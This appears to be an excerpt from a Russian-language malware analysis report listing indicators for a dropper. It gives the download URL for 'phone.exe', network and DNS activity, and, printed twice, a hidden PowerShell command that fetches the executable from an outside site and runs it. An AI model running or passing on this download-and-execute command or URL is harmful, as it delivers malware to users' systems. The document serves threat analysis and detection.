Техническая информация
- http://www.carrolltonluxuryapartments.com/proforma/phone.exe как %temp%\phone.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://www.carrolltonluxuryapartments.com/proforma/phone.exe','%TEMP%\phone.exe'); Start-Process('%TE...
- 'ca#######nluxuryapartments.com':80
- 'hu###omains.com':443
- http://www.ca#######nluxuryapartments.com/proforma/phone.exe
- 'hu###omains.com':443
- DNS ASK ca#######nluxuryapartments.com
- DNS ASK hu###omains.com
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://www.carrolltonluxuryapartments.com/proforma/phone.exe','%TEMP%\phone.exe'); Start-Process('%TE...' (со скрытым окном)